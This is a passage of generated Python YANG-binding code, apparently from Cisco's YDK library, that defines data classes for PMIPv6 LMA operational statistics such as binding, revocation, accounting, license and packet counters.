('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class AccountingStatistics(Entity):
"""
LMA Accounting Statistics
.. attribute:: accounting_start_sent_count
Count of Accounting Start Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_update_sent_count
Count of Accounting Update Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_stop_sent_count
Count of Accounting Stop Records Sent
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics, self).__init__()
self.yang_name = "accounting-statistics"
self.yang_parent_name = "customer-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('accounting_start_sent_count', (YLeaf(YType.uint64, 'accounting-start-sent-count'), ['int'])),
('accounting_update_sent_count', (YLeaf(YType.uint64, 'accounting-update-sent-count'), ['int'])),
('accounting_stop_sent_count', (YLeaf(YType.uint64, 'accounting-stop-sent-count'), ['int'])),
])
self.accounting_start_sent_count = None
self.accounting_update_sent_count = None
self.accounting_stop_sent_count = None
self._segment_path = lambda: "accounting-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics, ['accounting_start_sent_count', 'accounting_update_sent_count', 'accounting_stop_sent_count'], name, value)
class License(Entity):
"""
LMA License Statistics
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Instantaneous Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: peak_bce_count
Peak Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: peak_bce_count_reset_timestamp
Timestamp when the Peak Count of Bindings was reset
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.License, self).__init__()
self.yang_name = "license"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('peak_bce_count', (YLeaf(YType.uint32, 'peak-bce-count'), ['int'])),
('peak_bce_count_reset_timestamp', (YLeaf(YType.uint32, 'peak-bce-count-reset-timestamp'), ['int'])),
])
self.lma_identifier = None
self.bce_count = None
self.peak_bce_count = None
self.peak_bce_count_reset_timestamp = None
self._segment_path = lambda: "license"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.License, ['lma_identifier', 'bce_count', 'peak_bce_count', 'peak_bce_count_reset_timestamp'], name, value)
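# Sketch (assumption, not generated code): the license container exposes the
# instantaneous and peak binding counts read from the device.
#
#   lic = pmipv6.lma.statistics.license
#   print(lic.bce_count, lic.peak_bce_count, lic.peak_bce_count_reset_timestamp)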
class Global(Entity):
"""
Global Statistics
.. attribute:: packet_statistics
Packet Statistics
**type**\: :py:class:`PacketStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.PacketStatistics>`
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics>`
.. attribute:: accounting_statistics
LMA Accounting Statistics
**type**\: :py:class:`AccountingStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.AccountingStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: handoff_count
Count of Handoffs
**type**\: int
**range:** 0..4294967295
.. attribute:: single_tenant_count
Count of Single Tenants
**type**\: int
**range:** 0..4294967295
.. attribute:: multi_tenant_count
Count of Multi Tenants
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global, self).__init__()
self.yang_name = "global"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("packet-statistics", ("packet_statistics", Pmipv6.Lma.Statistics.Global.PacketStatistics)), ("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics)), ("accounting-statistics", ("accounting_statistics", Pmipv6.Lma.Statistics.Global.AccountingStatistics))])
self._leafs = OrderedDict([
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('handoff_count', (YLeaf(YType.uint32, 'handoff-count'), ['int'])),
('single_tenant_count', (YLeaf(YType.uint32, 'single-tenant-count'), ['int'])),
('multi_tenant_count', (YLeaf(YType.uint32, 'multi-tenant-count'), ['int'])),
])
self.lma_identifier = None
self.bce_count = None
self.handoff_count = None
self.single_tenant_count = None
self.multi_tenant_count = None
self.packet_statistics = Pmipv6.Lma.Statistics.Global.PacketStatistics()
self.packet_statistics.parent = self
self._children_name_map["packet_statistics"] = "packet-statistics"
self.protocol_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self.accounting_statistics = Pmipv6.Lma.Statistics.Global.AccountingStatistics()
self.accounting_statistics.parent = self
self._children_name_map["accounting_statistics"] = "accounting-statistics"
self._segment_path = lambda: "global"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global, ['lma_identifier', 'bce_count', 'handoff_count', 'single_tenant_count', 'multi_tenant_count'], name, value)
class PacketStatistics(Entity):
"""
Packet Statistics
.. attribute:: checksum_errors
Checksum errors
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: send_drops
Drop count of sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: receive_drops
Drop count of received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_received
Count of received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_sent
Count of sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: send_drops_ipv6
Drop count of IPv6 sent packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: receive_drops_ipv6
Drop count of IPv6 received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_received_ipv6
Count of IPv6 received packets
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packets_sent_ipv6
Count of IPv6 sent packets
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.PacketStatistics, self).__init__()
self.yang_name = "packet-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('checksum_errors', (YLeaf(YType.uint64, 'checksum-errors'), ['int'])),
('send_drops', (YLeaf(YType.uint64, 'send-drops'), ['int'])),
('receive_drops', (YLeaf(YType.uint64, 'receive-drops'), ['int'])),
('packets_received', (YLeaf(YType.uint64, 'packets-received'), ['int'])),
('packets_sent', (YLeaf(YType.uint64, 'packets-sent'), ['int'])),
('send_drops_ipv6', (YLeaf(YType.uint64, 'send-drops-ipv6'), ['int'])),
('receive_drops_ipv6', (YLeaf(YType.uint64, 'receive-drops-ipv6'), ['int'])),
('packets_received_ipv6', (YLeaf(YType.uint64, 'packets-received-ipv6'), ['int'])),
('packets_sent_ipv6', (YLeaf(YType.uint64, 'packets-sent-ipv6'), ['int'])),
])
self.checksum_errors = None
self.send_drops = None
self.receive_drops = None
self.packets_received = None
self.packets_sent = None
self.send_drops_ipv6 = None
self.receive_drops_ipv6 = None
self.packets_received_ipv6 = None
self.packets_sent_ipv6 = None
self._segment_path = lambda: "packet-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.PacketStatistics, ['checksum_errors', 'send_drops', 'receive_drops', 'packets_received', 'packets_sent', 'send_drops_ipv6', 'receive_drops_ipv6', 'packets_received_ipv6', 'packets_sent_ipv6'], name, value)
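# Sketch (assumption, not generated code): global packet counters carry IPv4
# totals in the unsuffixed leaves and IPv6 totals in the *-ipv6 leaves.
#
#   pkt = pmipv6.lma.statistics.global_.packet_statistics
#   print(pkt.packets_received, pkt.packets_sent, pkt.checksum_errors)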
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
